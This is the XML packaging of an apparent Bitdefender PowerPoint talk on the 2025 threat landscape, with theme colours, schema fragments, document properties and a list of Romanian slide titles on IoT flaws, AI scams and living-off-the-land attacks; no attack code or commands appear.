        <a:srgbClr val="FF7500"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="597080"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="65B0FB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="597080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="BitdefenderNew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tions_v2.2" id="{F5D5B5AE-1BEF-4E95-AD7C-0924FBEE53B9}" vid="{58B86CF6-60B3-4877-8E82-DF9E790AA225}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="CSG">
  <a:themeElements>
    <a:clrScheme name="BitdefenderNewBrand CSG">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="006EFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="006DFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002266"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FF0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00A71A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF7500"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="597080"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="65B0FB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="597080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="BitdefenderNew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presentations_v2.2" id="{F5D5B5AE-1BEF-4E95-AD7C-0924FBEE53B9}" vid="{D09DCD02-9E40-49C7-915B-F29E0AE5347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itdefender 2023">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="006EFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FF0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002266"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="006DFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00A71A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF7500"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="597080"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="65B0FB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="597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CC514F30F34469DADACF7E072EE05" ma:contentTypeVersion="17" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="74a2eb937c8f029b06fad67686c45310">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="9c3e7dd3-1ccf-44b0-a75f-1bfe097ce5a3" xmlns:ns3="bb11cfc0-7447-4c34-b638-d8c4818ee75e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a51ab2be1fdcfe60b20ffaf9ae0b91f0" ns2:_="" ns3:_="">
    <xsd:import namespace="9c3e7dd3-1ccf-44b0-a75f-1bfe097ce5a3"/>
    <xsd:import namespace="bb11cfc0-7447-4c34-b638-d8c4818ee7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3e7dd3-1ccf-44b0-a75f-1bfe097ce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ad4e8a-af43-410d-902c-65eb5df9e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11cfc0-7447-4c34-b638-d8c4818ee75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fb45945-11d1-4939-95ea-49bddf1dbf7c}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="bb11cfc0-7447-4c34-b638-d8c4818ee7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b11cfc0-7447-4c34-b638-d8c4818ee75e" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="9c3e7dd3-1ccf-44b0-a75f-1bfe097ce5a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B08738-B9E3-4902-83D6-E3968DE173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3e7dd3-1ccf-44b0-a75f-1bfe097ce5a3"/>
    <ds:schemaRef ds:uri="bb11cfc0-7447-4c34-b638-d8c4818ee7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E7867F-F05D-424C-BFEF-73F00FB61CEE}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="bb11cfc0-7447-4c34-b638-d8c4818ee75e"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="9c3e7dd3-1ccf-44b0-a75f-1bfe097ce5a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21B01B6-B31D-4BC7-9134-A5C322FC5B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Bitdefender Corporate Presentation</Template>
  <TotalTime>2941</TotalTime>
  <Words>1530</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>182</Paragraphs>
  <Slides>35</Slides>
  <Notes>10</Notes>
  <HiddenSlides>4</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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>IBM Plex Sans</vt:lpstr>
      <vt:lpstr>Lora</vt:lpstr>
      <vt:lpstr>Segoe UI Web (West European)</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Bitdefender Corporate Presentation</vt:lpstr>
      <vt:lpstr>BSG</vt:lpstr>
      <vt:lpstr>CSG</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Peisajul modern al amenințărilor informatice - 2025</vt:lpstr>
      <vt:lpstr>Intro</vt:lpstr>
      <vt:lpstr>Găsiți diferențele</vt:lpstr>
      <vt:lpstr>Dacă am trăi în Black Mirror, care din cele 3 episoade ar fi Realitatea noastră?</vt:lpstr>
      <vt:lpstr>Următorul Truman Show va fi difuzat de la tine din living</vt:lpstr>
      <vt:lpstr>«Welcome to the first channel in Europe dedicated to spycams. A maxi archive dedicated to the world of cameras where you can find unique material: apartments, bathrooms, garages, gym and swimming pool locker rooms, nightclubs, hotel rooms...»</vt:lpstr>
      <vt:lpstr>Vulnerabilități din IoT </vt:lpstr>
      <vt:lpstr>Vulnerabilități din IoT </vt:lpstr>
      <vt:lpstr>The big pictue (literalmente)</vt:lpstr>
      <vt:lpstr>Scam-uri cu AI sau cum am reinventat noi bunul simț</vt:lpstr>
      <vt:lpstr>Scam-uri pe instant messaging</vt:lpstr>
      <vt:lpstr>De la amuzament la atac targetat</vt:lpstr>
      <vt:lpstr>LLMs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Social Media și scam-urile avansate</vt:lpstr>
      <vt:lpstr>Scurtă istorie</vt:lpstr>
      <vt:lpstr>Ce e Living Off the Land?</vt:lpstr>
      <vt:lpstr>De ce sunt eficiente aceste atacuri?</vt:lpstr>
      <vt:lpstr>Ex. 1:  Fileless PowerShell</vt:lpstr>
      <vt:lpstr>Ex. 2:  Downloader / Dropper cu CertUtil</vt:lpstr>
      <vt:lpstr>Ex. 3:  WMI &amp; Rundll32 în Ransomware</vt:lpstr>
      <vt:lpstr>BONUS – TIKTOK HACKING </vt:lpstr>
      <vt:lpstr>Anatomia atacului</vt:lpstr>
      <vt:lpstr>Ce se întâmplă de fapt (I)</vt:lpstr>
      <vt:lpstr>Ce se întâmplă de fapt (II)</vt:lpstr>
      <vt:lpstr>De ce sunt atacurile acestea greu de detectat?</vt:lpstr>
      <vt:lpstr>Bitdefender PHASR</vt:lpstr>
      <vt:lpstr>Întrebări? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Întrebări? </vt:lpstr>
      <vt:lpstr>Ex. 1:  Fileless PowerShell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Bogdan BOTEZATU</dc:creator>
  <cp:lastModifiedBy>Bogdan BOTEZATU</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-11T08:36:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T09:08:13Z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0x010100785CC514F30F34469DADACF7E072EE05</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_SetDate">
    <vt:lpwstr>2023-04-05T09:16:54Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_Name">
    <vt:lpwstr>INTERNAL</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_SiteId">
    <vt:lpwstr>487baf29-f1da-469a-9221-243f830c36f3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_ActionId">
    <vt:lpwstr>fff5efe1-083e-4507-8030-e22faf574ae8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_9d9c527f-5235-45cb-bea5-98c00c666442_ContentBits">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ClassificationContentMarkingHeaderLocations">
    <vt:lpwstr>Bitdefender Corporate Presentation:6\BSG:3\CSG:3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="ClassificationContentMarkingHeaderText">
    <vt:lpwstr>Internal Use Only</vt:lpwstr>
  </property>
</Properties>
</file>